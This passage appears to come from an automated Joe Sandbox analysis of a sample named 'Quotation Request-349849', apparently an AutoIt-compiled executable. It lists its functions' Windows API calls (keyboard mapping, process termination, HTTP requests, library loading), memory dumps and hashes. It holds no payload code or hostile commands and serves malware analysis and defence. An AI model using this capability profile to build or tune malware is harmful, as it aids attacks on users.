                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: CapsDevice$Release
                                                      • String ID:
                                                      • API String ID: 1035833867-0
                                                      • Opcode ID: 7375a8b9910f81fc7e5f4273e5c5f363e9030063f565d52856528e302d34cd65
                                                      • Instruction ID: e7e98290a870caf600e48fd53fa92c6ec26016f328a6cba7723ac18beea5911e
                                                      • Opcode Fuzzy Hash: 7375a8b9910f81fc7e5f4273e5c5f363e9030063f565d52856528e302d34cd65
                                                      • Instruction Fuzzy Hash: E9017175E00719BBEF109BA69C45A5ABFA8FB48311F004065FA04E7291D6309C00CF91
                                                      Function 007F0162 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • MapVirtualKeyW.USER32(0000005B,00000000), ref: 007F0193
                                                      • MapVirtualKeyW.USER32(00000010,00000000), ref: 007F019B
                                                      • MapVirtualKeyW.USER32(000000A0,00000000), ref: 007F01A6
                                                      • MapVirtualKeyW.USER32(000000A1,00000000), ref: 007F01B1
                                                      • MapVirtualKeyW.USER32(00000011,00000000), ref: 007F01B9
                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 007F01C1
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Virtual
                                                      • String ID:
                                                      • API String ID: 4278518827-0
                                                      • Opcode ID: 1b767aead68275efb369a0a3c06028964213043c77add43bd03a685e539eb7dc
                                                      • Instruction ID: 013104a061c85d5d0551f969749005f273b7dde5f8e45d9bef76f6aa3116bbdb
                                                      • Opcode Fuzzy Hash: 1b767aead68275efb369a0a3c06028964213043c77add43bd03a685e539eb7dc
                                                      • Instruction Fuzzy Hash: 6A016CB09017597DE3009F5A8C85B52FFE8FF19354F00411BA15C47942C7F5A864CBE5
                                                      Function 008353E9 Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 008353F9
                                                      • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0083540F
                                                      • GetWindowThreadProcessId.USER32(?,?), ref: 0083541E
                                                      • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0083542D
                                                      • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00835437
                                                      • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0083543E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                      • String ID:
                                                      • API String ID: 839392675-0
                                                      • Opcode ID: 1e4bfb714c5c470d5dd6394b9daf59b32ee39e0cf56627e900a1f8d505b5c539
                                                      • Instruction ID: 246be81e3b57839c4139d461cccd961002565588b3c384754698aa394b324d10
                                                      • Opcode Fuzzy Hash: 1e4bfb714c5c470d5dd6394b9daf59b32ee39e0cf56627e900a1f8d505b5c539
                                                      • Instruction Fuzzy Hash: D4F01271141658BBE7215B52DC0DEEB7F7CFBD6B12F000169FB05D105296A51A0186B5
                                                      Function 00837230 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • InterlockedExchange.KERNEL32(?,?), ref: 00837243
                                                      • EnterCriticalSection.KERNEL32(?,?,007E0EE4,?,?), ref: 00837254
                                                      • TerminateThread.KERNEL32(00000000,000001F6,?,007E0EE4,?,?), ref: 00837261
                                                      • WaitForSingleObject.KERNEL32(00000000,000003E8,?,007E0EE4,?,?), ref: 0083726E
                                                        • Part of subcall function 00836C35: CloseHandle.KERNEL32(00000000,?,0083727B,?,007E0EE4,?,?), ref: 00836C3F
                                                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 00837281
                                                      • LeaveCriticalSection.KERNEL32(?,?,007E0EE4,?,?), ref: 00837288
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                      • String ID:
                                                      • API String ID: 3495660284-0
                                                      • Opcode ID: b1f53bf2663d7056870364da5b4c106c2cf4854a12a41162e47f817cff1162e5
                                                      • Instruction ID: cb7fc04a781f8b9f9c9768dd8dd30043ce237a6193d4ff7e41bc0d5104078ba8
                                                      • Opcode Fuzzy Hash: b1f53bf2663d7056870364da5b4c106c2cf4854a12a41162e47f817cff1162e5
                                                      • Instruction Fuzzy Hash: 3EF05EB6541712EBEB122B64ED4C9DB772AFF45703F500531F603914A2DB7A5815CB90
                                                      Function 00828992 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0082899D
                                                      • UnloadUserProfile.USERENV(?,?), ref: 008289A9
                                                      • CloseHandle.KERNEL32(?), ref: 008289B2
                                                      • CloseHandle.KERNEL32(?), ref: 008289BA
                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 008289C3
                                                      • HeapFree.KERNEL32(00000000), ref: 008289CA
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                      • String ID:
                                                      • API String ID: 146765662-0
                                                      • Opcode ID: 079179bdc16e91850151e3be98c6c041c826c63b0a67a3328f96a4e6d371dbb5
                                                      • Instruction ID: 4dbc0c80f970eb709fd5b187118ba4637ec762263d90b2b7a558a1a8551761de
                                                      • Opcode Fuzzy Hash: 079179bdc16e91850151e3be98c6c041c826c63b0a67a3328f96a4e6d371dbb5
                                                      • Instruction Fuzzy Hash: 00E0C236044601FBDA022FE1EC0C94ABB69FB89323B508230F31981571CB3AA420DB50
                                                      Function 008485ED Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • VariantInit.OLEAUT32(?), ref: 00848613
                                                      • CharUpperBuffW.USER32(?,?), ref: 00848722
                                                      • VariantClear.OLEAUT32(?), ref: 0084889A
                                                        • Part of subcall function 00837562: VariantInit.OLEAUT32(00000000), ref: 008375A2
                                                        • Part of subcall function 00837562: VariantCopy.OLEAUT32(00000000,?), ref: 008375AB
                                                        • Part of subcall function 00837562: VariantClear.OLEAUT32(00000000), ref: 008375B7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                      • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                      • API String ID: 4237274167-1221869570
                                                      • Opcode ID: 54c90048df8bd7b0bead9c0eb2e5a10d6949d857457cb66aea3ec55ef4cc3dd3
                                                      • Instruction ID: d1aa850d4c034bfcf42816f097b9bb13bfac031b5675ad27d6cec42bae34caf3
                                                      • Opcode Fuzzy Hash: 54c90048df8bd7b0bead9c0eb2e5a10d6949d857457cb66aea3ec55ef4cc3dd3
                                                      • Instruction Fuzzy Hash: CB912471604309DFC710DF28C48495ABBE4FB89714F14892EF99ADB361DB34E945CB92
                                                      Function 00832A96 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 007EFC86: _wcscpy.LIBCMT ref: 007EFCA9
                                                      • _memset.LIBCMT ref: 00832B87
                                                      • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00832BB6
                                                      • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00832C69
                                                      • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00832C97
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                      • String ID: 0
                                                      • API String ID: 4152858687-4108050209
                                                      • Opcode ID: c31f39fdf258c6f9df640c19f61e70a234b830c9d1c949e5876fcc666d426022
                                                      • Instruction ID: 797411052bfb9327ad52dde67cae9e85b82c48c66f1d847ebbce66c740f272c6
                                                      • Opcode Fuzzy Hash: c31f39fdf258c6f9df640c19f61e70a234b830c9d1c949e5876fcc666d426022
                                                      • Instruction Fuzzy Hash: D351DC716083109BDB25AF28D849A6FB7E8FFC8320F141A2DF991D2291DB74CD0687D2
                                                      Function 007E3137 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 161COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: _memmove$_free
                                                      • String ID: 3c~$_~
                                                      • API String ID: 2620147621-657907094
                                                      • Opcode ID: 34229b0c0a972dab3dc09ca0fce4f7ae142bd6e98539abad847b4ba2b2c28c5f
                                                      • Instruction ID: 85e0b009324fe91273c52e07f442752bd496bb539dd9e2937ab500e45b979afb
                                                      • Opcode Fuzzy Hash: 34229b0c0a972dab3dc09ca0fce4f7ae142bd6e98539abad847b4ba2b2c28c5f
                                                      • Instruction Fuzzy Hash: B8517C716053818FDB25CF29C844B6ABBE5FF8A314F44492DE989C7391EB35E941CB82
                                                      Function 007E6192 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 141COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: _memset$_memmove
                                                      • String ID: 3c~$ERCP
                                                      • API String ID: 2532777613-2728011545
                                                      • Opcode ID: f79fe18a2ee187d2bd9e39bc6155d4fea9085e7339def0d911e93ea09f0c5cd1
                                                      • Instruction ID: bf045732bba35c5c91a11facc0aa42ad973ea9188c6e690aea52b6bccfc9a046
                                                      • Opcode Fuzzy Hash: f79fe18a2ee187d2bd9e39bc6155d4fea9085e7339def0d911e93ea09f0c5cd1
                                                      • Instruction Fuzzy Hash: 3951D270901309DBDB24DFA6C8457AAB7F8FF18344F20856EEA4AD7241E774EA84CB40
                                                      Function 0082D56C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 121comlibraryloaderCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0082D5D4
                                                      • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0082D60A
                                                      • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0082D61B
                                                      • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 0082D69D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: ErrorMode$AddressCreateInstanceProc
                                                      • String ID: DllGetClassObject
                                                      • API String ID: 753597075-1075368562
                                                      • Opcode ID: 281a39c1eb414920077fa7ecc0e252271219883e322727f64fb739cdb3315adb
                                                      • Instruction ID: efac2032f6df9bf25b652d613c6b89eb39af91266c1328f349f0b66cd052796b
                                                      • Opcode Fuzzy Hash: 281a39c1eb414920077fa7ecc0e252271219883e322727f64fb739cdb3315adb
                                                      • Instruction Fuzzy Hash: 08419BB1600324EFDB05CF64D884A9ABFAAFF54314F1180A9AD09DF206D7B4D984CBE0
                                                      Function 00832753 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _memset.LIBCMT ref: 008327C0
                                                      • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 008327DC
                                                      • DeleteMenu.USER32(?,00000007,00000000), ref: 00832822
                                                      • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00895890,00000000), ref: 0083286B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Menu$Delete$InfoItem_memset
                                                      • String ID: 0
                                                      • API String ID: 1173514356-4108050209
                                                      • Opcode ID: c04018cbf56abe6e02798b803221a19264bc38bdee09d6e0bfaa9bf7b40618a9
                                                      • Instruction ID: 51686cc8dac8b1a07c7305dc1e0960a7106e2b754e1535b8c34ffb1dece1805b
                                                      • Opcode Fuzzy Hash: c04018cbf56abe6e02798b803221a19264bc38bdee09d6e0bfaa9bf7b40618a9
                                                      • Instruction Fuzzy Hash: D6418E702043419FD724DF28C844B2ABBE9FFC5314F14492EF9A6D7292D734A905CB92
                                                      Function 0084D7A5 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0084D7C5
                                                        • Part of subcall function 007D784B: _memmove.LIBCMT ref: 007D7899
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: BuffCharLower_memmove
                                                      • String ID: cdecl$none$stdcall$winapi
                                                      • API String ID: 3425801089-567219261
                                                      • Opcode ID: 42246af9940a99a92177c573e8f0aa7b667c2b0a3a042ba8e700d7995bb94a44
                                                      • Instruction ID: 1859de0b381d3f23409f241b948801350727a09e4908c78605dfabfe25bec2dd
                                                      • Opcode Fuzzy Hash: 42246af9940a99a92177c573e8f0aa7b667c2b0a3a042ba8e700d7995bb94a44
                                                      • Instruction Fuzzy Hash: 1E318B7190461DEBCF00EF58C8559BEB3B5FF14320B108A2AE865E77D2DB75A905CB80
                                                      Function 00828E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 007D7DE1: _memmove.LIBCMT ref: 007D7E22
                                                        • Part of subcall function 0082AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0082AABC
                                                      • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00828F14
                                                      • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00828F27
                                                      • SendMessageW.USER32(?,00000189,?,00000000), ref: 00828F57
                                                        • Part of subcall function 007D7BCC: _memmove.LIBCMT ref: 007D7C06
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$_memmove$ClassName
                                                      • String ID: ComboBox$ListBox
                                                      • API String ID: 365058703-1403004172
                                                      • Opcode ID: 6f2b52fd981786c536c9389e4977d77f154934c242b042f1c532dee00f0dfe86
                                                      • Instruction ID: 49aaa18bb2582b0f1fe721b5ecc4657f29a5172ac65e4019330b2c1b718b74b6
                                                      • Opcode Fuzzy Hash: 6f2b52fd981786c536c9389e4977d77f154934c242b042f1c532dee00f0dfe86
                                                      • Instruction Fuzzy Hash: 7C21E171A01108FADF18ABB4DC89CFFB7B9EF05320F14412AF821A72E1DE395849D610
                                                      Function 0084182D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86networkCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0084184C
                                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00841872
                                                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 008418A2
                                                      • InternetCloseHandle.WININET(00000000), ref: 008418E9
                                                        • Part of subcall function 00842483: GetLastError.KERNEL32(?,?,00841817,00000000,00000000,00000001), ref: 00842498
                                                        • Part of subcall function 00842483: SetEvent.KERNEL32(?,?,00841817,00000000,00000000,00000001), ref: 008424AD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                      • String ID:
                                                      • API String ID: 3113390036-3916222277
                                                      • Opcode ID: a46addc27bd1997a8510b02caefcd03711bd4702d66b967d23ce10bee7969aef
                                                      • Instruction ID: cfae0e0de7dd00b63736fb9403150c41cd72c8cd27447302d24c0794475cef9e
                                                      • Opcode Fuzzy Hash: a46addc27bd1997a8510b02caefcd03711bd4702d66b967d23ce10bee7969aef
                                                      • Instruction Fuzzy Hash: 2C21BBB150030CBFEB119B64CC89EBB7BEDFB88749F10413AF905E3240EA288D4497A1
                                                      Function 008563E7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 007D1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 007D1D73
                                                        • Part of subcall function 007D1D35: GetStockObject.GDI32(00000011), ref: 007D1D87
                                                        • Part of subcall function 007D1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 007D1D91
                                                      • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00856461
                                                      • LoadLibraryW.KERNEL32(?), ref: 00856468
                                                      • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 0085647D
                                                      • DestroyWindow.USER32(?), ref: 00856485
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                      • String ID: SysAnimate32
                                                      • API String ID: 4146253029-1011021900
                                                      • Opcode ID: 23f9ff41c2403f331ac2e9376c3e7031054a7d5608e56c77091008497b0a41dc
                                                      • Instruction ID: 541908de8fe19e5c7ca07997d09076e30a3accc75bc0cbba59a5eaffb6836be0
                                                      • Opcode Fuzzy Hash: 23f9ff41c2403f331ac2e9376c3e7031054a7d5608e56c77091008497b0a41dc
                                                      • Instruction Fuzzy Hash: 12218B71200205BBEF104FA4DC80EBB77A9FB58369F904629FE10D3191E7359C659764
                                                      Function 00836D9C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetStdHandle.KERNEL32(0000000C), ref: 00836DBC
                                                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00836DEF
                                                      • GetStdHandle.KERNEL32(0000000C), ref: 00836E01
                                                      • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00836E3B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
